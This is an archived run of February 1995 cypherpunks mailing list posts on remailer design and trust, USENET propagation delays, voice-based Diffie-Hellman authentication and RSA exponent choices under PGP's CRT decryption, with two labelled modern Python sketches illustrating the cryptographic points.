From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 1 Feb 95 05:56:47 PST
To: cypherpunks@toad.com
Subject: Re: CD-ROM [brief addition]
Message-ID: <9502011353.AA00592@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> Why not produce it outside the US and import it ?

:-)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Wed, 1 Feb 95 12:11:00 PST
To: cypherpunks@toad.com
Subject: Re: Fundamental Question?
Message-ID: <199502012007.PAA13259@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199502011911.OAA09754@bwnmr5.bwh.harvard.edu>,
Adam Shostack <adam@bwh.harvard.edu> wrote:
>	Its awfully expensive to send messages all over creation so
>one person can read them.  Much better to send it to the person who
>wants to read it.  Besides, USENET propagation can be slower than
>remailers; the far ends of the chain can often take around a week.

1.  Let's have some perspective here.  Remailer traffic can't really be
expected to exceed the traffic in, for example, alt.binaries.pictures.erotica.
Additionally, with USENET it's trivial to control when are whether you
receive particular groups.  Don't want to carry alt.anonymous.remailer.channel?
No problem.  Don't.

2.  USENET propogation is not that slow;  Between well connected sites
(IE, just about any Internet host that isn't swamped for other reasons
like Netcom frequently is) I haven't seen a larger lag than a few hours.

The biggest reason to use remailers is not to avoid interception of
traffic: that's a trivial problem with PGP.  The biggest threat is that
of traffic analysis: Alice doesn't want her boss Charlie to know she's
having an ongoing discussion with Bob about a new "career opportunity."

As I've said, I think USENET is perfect for this.  Add some reordering to
the processing and a hidden way to define the intended recipients and no
way that passive traffic analysis is going to succeed.
- - --
Todd Masco     | "Schooling serves to reduce the risk of being eaten."
cactus@hks.net |                           - Scientific American, June, 1982
     Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy+w1xNhgovrPB7dAQFjcgQAqc6eu22NAB8wE5iAyyGMTFbwlXLbiHF0
FUmJlWXQ4J8EkPXEa+ZUKGlcbCETjQ2rXxzHh3cOiVxjRVnKKh5Q/VmU4JOALPXE
lBIfH+W8ty0LxaXBue9KkXh4cFvoehW7UXhq9oitNgSqiTmf/EoCbjJc5A7w7YHd
Aqu7sgyyPFQ=
=4UNd
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLy/p3CoZzwIn1bdtAQGkNgGAtR+F+nkckmLHgvrlurrHsGng24kdBu4R
20AwntDjdEcZjNHAqrc/aCf8TKVhUUJV
=o09G
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 15:23:59 PST
To: cypherpunks@toad.com
Subject: Re: Fundamental Question?
Message-ID: <9502012323.AA00271@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>2.  USENET propagation is not that slow;  Between well connected sites
>(IE, just about any Internet host that isn't swamped for other reasons
>like Netcom frequently is) I haven't seen a larger lag than a few hours.

Consider the incoming directory on my local news host:

--
jlc:/usr/spool/news/in.coming$ ls -l
total 401
-rw-r--r--   1 news     news       172237 Feb  1 16:08 21705-000000.t
drwxr-xr-x   2 news     news         1024 Jan 31 13:43 bad/
-rw-r--r--   1 news     news        79792 Jan 27 12:35 nntp.a00606
-rw-r--r--   1 news     news       130025 Feb  1 16:09 nntp.a21731
drwxr-xr-x   2 news     news        21504 Jan 21 12:57 save/
-rwxr-xr-x   1 news     news          194 Nov 30 14:22 unz*
jlc:/usr/spool/news/in.coming$ grep Date 21705-000000.t | more
Date: Mon, 30 Jan 1995 18:28:21 GMT
Date: Mon, 30 Jan 1995 18:34:30 GMT
Date: 30 Jan 1995 11:03:14 -0800
Date: 30 Jan 95 13:25:19 +0200
Date: 30 Jan 1995 13:35:59 -0500
Date: 30 Jan 95 17:59:27 GMT
Date: 30 Jan 1995 13:25:40 -0500
Date: 27 Jan 1995 14:11:51 -0600
Date: 27 Jan 1995 14:50:32 -0500
--

The majority of incoming messages are two days old (this was on Feb 1 at
16:10, GMT -7); the worst instance in this particular batch was six days
old (posted from a backwater site in Sweden).

Before you object that this is obviously a poorly-connected site, we're
on a leased 56K line two hops from the backbone (we're fed by BYU, who
is in turn fed by the University of Utah, one of the original four
internet sites and as well fed as you get). Our server is keeping up
with the incoming news. I suspect this is a pretty typical scenario.

--
    Kevin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 1 Feb 95 13:37:44 PST
To: norm@netcom.com (Norman Hardy)
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <ab559e8c000210040b91@DialupEudora>
Message-ID: <199502012138.QAA26261@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>I trust that the attack referred to is the "man-in-the-middle". I find
>it very curious that there is a simple fix to the attack for the encrypted
>voice channel. Each unit displays to its human a few bits of g^(xy). One
>human quotes them vocally to the other. If there is a man in the middle the
>bits are unlikely to match. What I find curious is that there seems to be
>no automated analog to this precaution. It has to do with the difficulty of
>substituting the vocal signals that code these bits. This is too hard for
>either computer or man (in the middle). I write to stimulate a solution. I
>have none.
>
>
The reason there's no "computer" analog to the "anti-spoofing vector"
for human-human voice communication lies in the definition of
authentication.  In a formal sense authentication here means binding a
secret that only you know to the encrypted channel.  In the case of voice
communication over an encrypted link, that "secret" consists of the ability
to hold a convincing exchange that sounds like your voice.  You bind the
secret to the channel by speaking a hash of the key.  Computers, not
pre-equipped with biological mechanisms for establishing who they are,
need to use another secret (like knowledge of the secret part of a public
key signature pair) to which only the computer you want to authenticate has
access.

The encrypted human voice authentication scheme is only as strong as it
is hard to spoof voices.  Digital signature authentication is only as
strong as it is hard to break the signature scheme or compromise the
signing key.

-matt
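
The spoken check discussed in this exchange (each unit shows a few bits derived from g^(xy) and the two people compare them by voice), as an added sketch that is not code from either message or from any product named on the list. The toy group, SHA-256 as the hash, and every name in the block are assumptions made for the illustration; it also measures how often a substituted exchange goes unnoticed when the displayed string is very short.

```python
import hashlib
import secrets

# Toy group, an assumption made for this example only: 2**521 - 1 is a
# Mersenne prime that is easy to write down. It is not a vetted DH group.
P = 2**521 - 1
G = 3


class Unit:
    """One end of an unauthenticated Diffie-Hellman exchange."""

    def __init__(self):
        self.x = secrets.randbelow(P - 3) + 2       # private exponent in [2, P-2]
        self.public = pow(G, self.x, P)             # g^x, sent in the clear
        self.shared = None

    def receive(self, peer_public):
        # Reject the values that would force a trivial shared secret.
        if not 1 < peer_public < P - 1:
            raise ValueError("degenerate public value")
        self.shared = pow(peer_public, self.x, P)   # g^(xy)

    def check_string(self, bits=32):
        """Top `bits` bits of SHA-256(g^(xy)), as hex digits to read aloud."""
        if self.shared is None:
            raise RuntimeError("no key agreed yet")
        digest = hashlib.sha256(self.shared.to_bytes(66, "big")).digest()
        value = int.from_bytes(digest, "big") >> (256 - bits)
        return f"{value:0{(bits + 3) // 4}x}"


def direct_exchange(bits=32):
    """Both units see each other's real public value."""
    a, b = Unit(), Unit()
    a.receive(b.public)
    b.receive(a.public)
    return a.check_string(bits), b.check_string(bits)


def relayed_exchange(bits=32):
    """An intermediary replaces each public value with its own, so the two
    ends hold different keys without knowing it."""
    a, b, middle = Unit(), Unit(), Unit()
    a.receive(middle.public)    # a believes this came from b
    b.receive(middle.public)    # b believes this came from a
    return a.check_string(bits), b.check_string(bits)


def undetected_rate(bits, trials):
    """Fraction of relayed exchanges whose check strings happen to agree,
    i.e. the cases the spoken comparison would not catch."""
    hits = 0
    for _ in range(trials):
        a, b = relayed_exchange(bits)
        hits += (a == b)
    return hits / trials


if __name__ == "__main__":
    print("direct :", direct_exchange())
    print("relayed:", relayed_exchange())
    # With a 4-bit string roughly 1 in 16 substitutions slips through;
    # each extra bit halves that.
    print("undetected at 4 bits:", undetected_rate(4, 1000))
```

The comparison only authenticates anything because the strings are exchanged over the voice channel, where the binding secret is the speaker's recognisable voice; sent as data over the same link, they could be replaced along with the public values.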




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Masco <cactus@hks.net>
Date: Wed, 1 Feb 95 13:47:13 PST
To: cypherpunks@toad.com
Subject: FMP
Message-ID: <199502012143.QAA14255@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Can anybody tell me where I might be able to find the FMP library (
Riordon's PD GMP-a-like)?  Archie turns up empty.

Thanks,
- --
Todd Masco     | "Schooling serves to reduce the risk of being eaten."
cactus@hks.net |                           - Scientific American, June, 1982
     Cactus' Homepage

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzAAXyoZzwIn1bdtAQHjuwF+JHUY0HeNtzptxC2hTuVRrNV/s9/k1DeZ
F0XE3PUFvSTBCyo9iv++O31td0xt1YWj
=3iAP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 15:48:30 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <9502012348.AA00549@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Without quoting the entire message, I think a better solution, in terms of
>ease to implement as well as conserving bandwidth would be to have a
>sophisticated remailer script-language.
>
>For instance, the script language could tell the remailer to check if a
>site is on-line (perhaps within certain GMT hours or dates) and use the
>next site if not available, or to randomly choose from a list of sites
>the active ones, etc.

Aye, there lies the rub. How exactly does one determine if a site is
active or generate a current list of active sites? It is not enough to
ping the site or even to successfully deliver mail to it: the fact that
something is alive and running sendmail does not make it a remailer.

Likewise, a remailer cannot select an alternate site on behalf of the
user if the routing is chosen by the user, as each "envelope" is
encrypted specifically for a given remailer. I suppose one could develop
client software that built several redundant "envelopes" for alternate
mailers, but that would get out of hand pretty quickly, both in terms of
the effort of generating a secure message and in terms of the size of a
message.

Scripting is useful (hell, the ::Request-Remailing lines are effectively
a script) but not until there is data to operate on.

>Maybe even have it work with a data haven? Mail the message to a data haven
>and send another message to a remailer chain to pull the message from the
>data haven and post the data (note flaws in this: don't want remailers getting
>files from people's accounts and posting them to usenet etc.).

Not a bad idea, actually.

--
    Kevin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 16:17:20 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <9502020017.AA00895@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>1.  Broadcasting every couple of minutes isn't necessary and is undesirable
>due to the real limitations of the Internet.  A remailer could broadcast
>its location with a time-out on the location without a constant stream
>of availability announcements.  In your position for example, you'd
>broadcast a message at 5 pm with a 16 hour valid time.

True, but this has two basic assumptions that I disagree with: first,
that we can guarantee delivery of a broadcast message to all interested
sites; and second, that remailers never go down for unexpected reasons.
When the day comes that both networks and software are perfect, this
method will be reliable. Of course, you are also right that broadcasting
is undesirable; that is why I am pondering a way to minimize the impact.

>2.  This is actually unnecessary for your situation: All you need to do is
>advertise your location as a "real" remailer and then have a cron job that
>kills sendmail at 5pm on your remailer machine (assuming you have a spare
>machine that doesn't need to run sendmail).  The mail network is flexible
>enough that things will Just Work.  Mail won't go through instantly during
>the day, of course, but that just helps to muddy up the mix.

But, if my understanding of remailer operation is correct, this has two
potential problems: first, I will still receive mail during the day,
causing a bandwidth concern (I know, it's probably not a problem right
now, particularly since users will probably choose to avoid a remailer
with a possible 16 hour delay); and second, the machine delivering mail
to me simply has to trust that a remailer will in fact pop up on this
machine to process the stored mail. There is no way of determining that
mail is not simply going into a black hole. And even if I try to be nice
when the mailer goes down permanently and tell everyone not to route
mail through it any more, that news still has to travel via word of
mouth to all users of the web.


>
>3.  Broadcasting over live IP isn't all that great a model.  Ideally,
>you'll use a mechanism that doesn't require instant communication among
>hosts.  I favor USENET for this: messages have a naturally long life-
>time and the network is self-adjusting.  If a direct route is temporarily
>unavailable, an indirect one will often manifest itself.  I also favor
>using USENET store-and-forward for the messages themselves for the same
>reasons: traffic analysis is impossible inside the web and direct routes
>are not necessary.

I am not happy with my proposed advertising methods, and was quietly
hoping for some guidance from internet gurus on this point (the irc
suggestion in particular is a pretty shaky straw man). However, see my
earlier message (on some other thread) about Usenet propagation times.
Propagation times in days do not seem to be rare (post to misc.test and
see when the last reply comes back). While this is better than
word-of-mouth propagation, it does not offer the very low latency I was
looking for.

>4.  Using a PGP-style web-of-trust is important.  In the ideal situation,
>one human in an extended web can certify individual remailers and all other
>remailers close enough on the same web of trust would pick up the message
>immediately.

It strikes me as critical; right now, a user has to choose to trust a
set of remailers, given no assistance other than a list of "reliable"
ones. Given an extended web of trust between remailers, the user can
choose to trust one remailer (I have no idea how to make this process
more palatable) and immediately gain the security of a large web of
remailers (maybe you are right about that instant gratification
thing...)

    Kevin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 17:00:38 PST
To: cypherpunks@toad.com
Subject: Re:  Frothing remailers - an immodest proposal
Message-ID: <9502020100.AA01613@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>I have some concerns about Kevin's frothing remailers.  Like so many of
>the proposals we see to put more responsibility into the remailer net,
>this opens vulnerability to a single bad remailer.  If I trust the first
>remailer in the net to choose my path for me, as I might be tempted to
>do with a froth, then if that remailer is corrupt my anonymity is lost.
>With user-supplied chaining I am secure unless all of the remailers on
>the chain are corrupt.

Firstly, I certainly do not propose that we remove user-supplied
chaining; it is obviously vital to true anonymity. What I am
suggesting is that we allow remailers to introduce more noise into the
mix using information that users cannot easily obtain for themselves
(e.g. which remailers are in operation at this moment). In the
apparently common case of unencrypted messages crossing the net, this is
at least no worse than the current situation. Of course, we would also
have to allow users to specify that no munging of the route be allowed
(some form of scripting). Trusting remailers to obey this request
requires no more trust than we already place in them (which, I believe,
is considerably more than most seem willing to admit).

If you succumb to the temptation and trust remailer #1 totally, then you
of course run the risk of sacrificing anonymity. However, if you do
not trust remailer #1 so completely and specify a chain of remailers,
but allow remailer-generated routing between the points on that chain,
you gain resistance to traffic analysis as well as making it possible
for smaller transient remailers to play a useful role.

>I also do not like the kind of close-knit, cozy cooperation among the
>guild of remailer operators which seems to be envisioned in this and
>similar proposals.  Do you like the idea of messages on the remailer
>operators list saying, I am getting objectionable messages from your
>remailer, would you mind dropping in a log so we can see who is sending
>these messages which violate the Politically Correct Speech Act?

I don't see what would prevent this from happening now. The only degree
of cooperation I require from remailer operators is that they agree on
some software standards and that, if they choose, they create extended
webs of trust via signing one another's keys. There is no requirement
that all remailers or remailer operators trust all other remailer
operators; in fact, I think this would be undesirable, even if the trust
were justified.

Again, remember that control lies with the user. If you choose, you can
allow a remailer to bounce your mail through its web of trust before
forwarding it to the next point on your chain. I do not believe that
this increases the risk of losing anonymity. I do also propose that
this be the default behavior in order to provide naive users with some
degree of security, as well as using their traffic to obscure that of
more sophisticated users.

>I do like Kevin's ideas about a dynamic remailer net, but I think
>another approach would put more smarts into the client program used by
>the originator.  Granted, his information will be somewhat more out of
>date as the message makes its way through the network.  But depending
>on the time scale at which the froth, um, froths, this should still
>allow a lot more dynamism among the set of remailers.  Using either IRC
>or, as Todd suggested, Usenet to maintain an active remailer list might
>work.  We could also have a distributed set of sites which provide the
>information by finger like the pinging sites we have now.

True, all true (I seem to be saying this a lot today). My transient
remailer problem can be solved by publishing the times of availability
(assuming, of course, that my remailer will always be up when
scheduled). My only serious objection to this is that there will always
be more clients with more operating systems and platforms than there
will be servers. I don't expect that it will be easy to create new
standards for remailers and get significant numbers of operators to
implement or use them, but I do believe that that task is easier than
making smart clients available on all possible platforms.

[ Safe-TCL comments deleted]

>What you need then is some way for various messages to interact with each
>other, so that, for example, a message could wait until there were a
>certain number of other messages inside the machine before it sent itself
>out.  You would also want a way for a message to suspend itself until
>some future event, such as having a certain amount of time passing, or
>waiting until some message with desired properties arrived.

This is a fine suggestion; as I mentioned in an earlier message,
scripting is not useful without data to operate on. You have suggested a
number of data that a remailer could usefully provide to a message,
making scripting more useful. Of course, you have to trust that the
remailer is not lying to your script.

[ More Safe-TCL comments and a plea for smarter clients rather than
smarter servers, to which I reply with the earlier argument, deleted.]

--
    Kevin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 31 Jan 95 22:33:39 PST
To: cypherpunks@toad.com
Subject: Re: CD-ROM [brief addition]
In-Reply-To: <199502010224.SAA24809@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.950201173554.15921D-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, sameer wrote:

> 	I forgot to mention that the CD-ROM in development will be
> export restricted. It isn't going to be sold outside the united states
> and canada.

Don't worry - we sorta figured that :-(

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjwohler@netcom.com (Marc Wohler)
Date: Wed, 1 Feb 95 17:57:46 PST
To: cypherpunks@toad.com
Subject: NYC area C'Punks meet 2/11/95
Message-ID: <199502020150.RAA29578@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Attn.: New York City area Cypherpunks

NYC C'punks meeting:

Sat Feb 11, 3:00 P.M., at the home of Linn & Barbara  Stanton
315 West 106 Street  Apt 2A 
(Between West End Ave & Riverside Drive)
212-316-1958.

Once again the gracious Stantons invite local area Cpunks to
their lovely home which is smoke free and feline friendly.

The agenda is still open and suggestions can be made to
mjwohler@netcom.com
or phone Marc Wohler @ 212-362-0690. Let me know if you plan to
attend.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 17:18:11 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <9502020118.AA01956@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[deletia]

>Now, dynamic rerouting is good for better delivery, but is bad for the
>trust in silence.  Trust in externally unverifiable properties is
>_not_ transferrable.  Just because I believe that my regular remailer
>is OK does not mean you do.  The creation of these links of trust is
>not something that can be automated solely by the remailer operators.
>The end users of the remailers are the endpoints of this trust
>relationship.  The end users must be involved, either directly or
>through some (legal) agent, in the manipulation of these relationships.

First, I must admit to being somewhat out of my depth here; this seems
to be becoming a philosophical problem. With that shameful admission out
of the way, let me bull ahead regardless.

It seems to me that I can choose to trust in the fact that *your* trust
in other remailers is well founded. This then becomes a third category
of trust for a given remailer: trust that it will deliver (verifiable);
trust that it will be silent (unverifiable); and trust that its
operator has good judgement in choosing who to trust (unverifiable).
These latter two are, and should be, the end user's responsibility.

Now, as I have mentioned in an earlier message (I'm being far too
verbose today) I am proposing that dynamic routing be optional, though
the default behavior, for reasons mentioned there. Thus, if I, as user,
choose to allow dynamic routing (through omission - I must admit, I am
becoming less fond of the notion of this as default behavior - it begins
to smack of the heresy of "implied consent") I am expressing the third
flavor of trust, just as by using the remailer at all, I am expressing
the second variety.

Of course, I still have to trust that a remailer will honor my routing
requests. However, I believe this falls fair and square into the second
category (trust in silence).

>Any solution which tries to do this independent of the end user is
>broken, by definition.

--
    Kevin

    ( I have no joke here, I just like saying "I trust a remailer if
      it is trusted by an entity I trust to trust remailers".)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Feb 95 18:13:38 PST
To: cypherpunks@toad.com
Subject: Re:  Lucky primes & omlets on my face...
Message-ID: <199502020213.SAA17094@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Nathan Zook <nzook@bga.com>

> Recall:  x^p = x mod p therefore, x^(p-1) = 1 mod p. So what we need is:
> (x^e)^d = x^ed = x^(p-1)*i+1 = x mod p.  

This would only be true for prime p, but with RSA we are dealing with
composite moduli.  What we want is ed=1 mod phi(n), where
phi(n)=(p-1)(q-1).  (Actually you want to use (p-1)(q-1)/gcd((p-1),(q-1)).
I forget what that is called.)

Conceptually, I gather you are setting e = 0x10001, then finding its
multiplicative inverse d mod phi(n) (or mod p-1 in your example).  Then
you are looking for other possible values for d.  I am a little unclear
on what the interval would be between suitable values of d.  I think it
would be phi(n)/gcd as above, or p-1 in your example, but I am not sure.

> Let's try this again.
>  
> Let 2*x be the target number of bits in the modulus.
>  
> Let n be a large random number with x+2 digits.
> Let n1 be the next multiple of 0x10001.
> Let t2 be n1 mod 8, t3 be n1 mod 9, t5 be n1 mod 25, t7 be n1 mod 49.
>  
> Loop:
> For i = 2 to 7
>  If n1 = 1 mod i and (n1-1)/i + 1 is not a multiple of {2,3,5,7}
>     If (n1-1)/i + 1  is prime.
>       {
>         Let k = 0's in n1/0x10001.
>         If k is in range, save and exit.
>       }
>     EndIf
>  EndIf
> Next
> n1 += 0x10001;
> EndLoop
>  
> Recall:  x^p = x mod p therefore, x^(p-1) = 1 mod p. So what we need is:
> (x^e)^d = x^ed = x^(p-1)*i+1 = x mod p.  
>  
> ie: ed = (p-1)*i+1
> or: (ed - 1) / i + 1 = p
>  
> Now 0x10001 inverts easily, it is just n1/0x10001.  By keeping track of
> various quantities, we can eliminate all multiprecision divisions except
> for the original one needed to get n1 and the t's, and doing increments
> instead.

I still don't follow this.  Is k claimed to be d?  Where do we verify
that ed=1 mod (p-1)?  ed would be n1, right?  When you said "If (n1-1)/i
+ 1 is prime" did you mean "is p"?  I really don't think this whole thing
works.

Let me tell you what I tried.  I inverted e to get a correct d.  Then I
looked at different d's to find one with lots of 0's.  This turned out
to be useless!  The reason is that PGP does not use d.  It uses the
Chinese Remainder Theorem to do its exponentiation.  The two
exponentiations it does use exponents d mod (p-1) and d mod (q-1).
Adding multiples of phi to d does not change these values (since it is
a multiple of both p-1 and q-1).

Now one thing you could do is to use in place of d mod (p-1),
(d mod (p-1)) + k*(p-1) where we choose k to minimize the sum of the number
of bits and the number of 1 bits in this expression.  Unfortunately the
PGP data structures do not store d mod (p-1), it is constructed on the
fly when you do a decryption.  So there is nowhere to save a
pre-computed optimal value for the two exponents used in the CRT
exponentiations.  So, this was a good idea, but the implementation does
not fit into the current structure very well.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzA/mhnMLJtOy9MBAQEjmAIAzQbwkia3F7+4F7tNUewKnZVYsBEhgoBk
h5jem/qjUxFeGhYNUL/pSLKJPR+PlzleZmBQJyOlk3q7KL0ety851g==
=EHVe
-----END PGP SIGNATURE-----
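
The point made in the message above, as an added example that is not part of the original post: adding multiples of lcm(p-1, q-1) to d leaves the CRT exponents unchanged, while dp + k*(p-1) is an equivalent exponent whose square-and-multiply cost can be searched over k. The primes, the search bound max_k and all function names are assumptions chosen for illustration; the primes are toy-sized and not secure.

```python
from math import gcd

E = 0x10001                 # public exponent discussed in the thread
P = 2**31 - 1               # constructed toy primes (Mersenne), far too
Q = 2**61 - 1               # small for real use


def lcm(a, b):
    return a // gcd(a, b) * b


def keygen(p, q, e=E):
    """Derive d and the two CRT exponents from p, q and e."""
    lam = lcm(p - 1, q - 1)             # (p-1)(q-1)/gcd(p-1, q-1)
    d = pow(e, -1, lam)                 # e*d = 1 mod lam (Python 3.8+)
    return {"n": p * q, "lam": lam, "d": d,
            "dp": d % (p - 1), "dq": d % (q - 1)}


def crt_decrypt(c, p, q, dp, dq):
    """RSA private operation done as two half-size exponentiations."""
    m1 = pow(c, dp, p)
    m2 = pow(c, dq, q)
    h = (pow(q, -1, p) * (m1 - m2)) % p  # Garner recombination
    return m2 + h * q


def exponent_cost(x):
    """Sum of the number of bits and the number of 1 bits in x
    (one squaring per bit, one multiply per 1 bit)."""
    return x.bit_length() + bin(x).count("1")


def cheapest_equivalent(dp, p, max_k=64):
    """Find k in [0, max_k) minimising the cost of dp + k*(p-1).
    Every candidate gives the same result mod p by Fermat's theorem."""
    k = min(range(max_k), key=lambda j: (exponent_cost(dp + j * (p - 1)), j))
    return k, dp + k * (p - 1)


if __name__ == "__main__":
    key = keygen(P, Q)
    m = 0x1234567890ABCDEF
    c = pow(m, E, key["n"])

    # Changing d by multiples of lam does not touch the CRT exponents.
    for j in range(3):
        d_alt = key["d"] + j * key["lam"]
        print(j, exponent_cost(d_alt), d_alt % (P - 1) == key["dp"])

    # Changing the CRT exponent itself is what alters the work done.
    k, dp_alt = cheapest_equivalent(key["dp"], P)
    print("k =", k, "cost", exponent_cost(key["dp"]), "->", exponent_cost(dp_alt))
    print("still decrypts:", crt_decrypt(c, P, Q, dp_alt, key["dq"]) == m)
```
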




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Wed, 1 Feb 95 10:59:25 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: The security characteristics of crypto modules withsecrets
In-Reply-To: <199502011528.KAA23229@crypto.com>
Message-ID: <3573AD49>
MIME-Version: 1.0
Content-Type: text


Matt and Cypherpunks, etal.

I have been designing secure crypto modules for many years.  The
primary difficulty has been getting anyone to shell out the money to
buy them.  Perhaps things will be different with PC Cards.

Peace. Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 1 Feb 95 16:58:23 PST
To: cypherpunks@toad.com
Subject: Lucky primes & omlets on my face...
Message-ID: <Pine.3.89.9502011814.A8923-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
Considering the general temperature of this list, I'm amazed that I didn't
get torched over my algorithm.  sigh.  The c-punks are all too busy
debating operating systems to worry about efficiency in their remailers.
 
Unless, of course, Hal's "I don't understand" was from the Moore school?
 
Let's try this again.
 
Let 2*x be the target number of bits in the modulus.
 
Let n be a large random number with x+2 digits.
Let n1 be the next multiple of 0x10001.
Let t2 be n1 mod 8, t3 be n1 mod 9, t5 be n1 mod 25, t7 be n1 mod 49.
 
Loop:
For i = 2 to 7
 If n1 = 1 mod i and (n1-1)/i + 1 is not a multiple of {2,3,5,7}
    If (n1-1)/i + 1  is prime.
      {
        Let k = 0's in n1/0x10001.
        If k is in range, save and exit.
      }
    EndIf
 EndIf
Next
n1 += 0x10001;
EndLoop
 
Recall:  x^p = x mod p therefore, x^(p-1) = 1 mod p. So what we need is:
(x^e)^d = x^ed = x^(p-1)*i+1 = x mod p.  
 
ie: ed = (p-1)*i+1
or: (ed - 1) / i + 1 = p
 
Now 0x10001 inverts easily, it is just n1/0x10001.  By keeping track of
various quantities, we can eliminate all multiprecision divisions except
for the original one needed to get n1 and the t's, and doing increments
instead.
 
>Yes, I see that you are right about this.  It would be easy to generate
>e,d pairs and get a d which is significantly short on 1's by 10% or more.
>I did not quite follow your algorithm to do this (was n the modulus or
>was it phi, the sum of the modulus' divisors?).  The one caveat is that
>if "high-zero" decryption exponents are widely used, it could conceivably
>reduce the search space somehow, although I don't see offhand how to
>exploit this.
>
>Hal
 
>>     (you may wish to ensure that k is _above_ a certain threshold...)
 
I don't either, but if >80% of the digits were 0, I'd probably start to
get nervous.  But I don't need a fast-key for my home system, I'm barely
handling 10 signatures a day.  I only advocate using high 0's when you are
in a high usage environment.
 
Nathan
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 1 Feb 95 16:59:39 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9502011857.B8923-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal <hfinney@shell.portal.com>
 
>I still don't quite follow this. 
 
Clearly.  ;)
 
Okay.  You are right that the first remailer derives no primary benefit,
and engages in no primary risks from verifying signatures.  Alice, however
does, and Chaum is, after all, providing a service to Alice (and Frank).
He does wish to provide all the benefits that he can to them.
 
What benefit does Alice gain?
1) Plausible deniability.  Remember, "reasonable doubt."  Remember Abscam?
   The gov't is in a good position to fake source info.  This squishes
   that.  (It squishes even better if Chaum _requires_ signatures.)
 
2) If Chaum sends Alice a copy of the message that failed the signature
   check, Alice knows that someone is trying to spoof her.  This
   information may be critical in determining how serious her opponents
   are.
 
What risks does Alice take?
If the final message to Bob is encrypted, and Chaum is not compromised,
none.  If Chaum _is_ compromised, Alice is chaining anyway, so it still
doesn't matter.
 
What might Chaum gain from checking or requiring signatures?
Various net abuses often involve faking names.  Requiring validated
signatures would pressure these abuses away from the remailers.  Reducing
the net abuses going through the remailers is a PR goal.
 
 
>PGP already includes a cryptographically protected length field in the
>message.  It will ignore any data past that, according to my experiments.
>All that is needed is a simple patch to add junk data to the end.
 
Soapbox mode:
It seems to me that hacking PGP requires considerably more cooperation
between remailers, and more work than just allowing recursive opening of
PGP packets, automatic padding (or concatenating) of data, and automatic
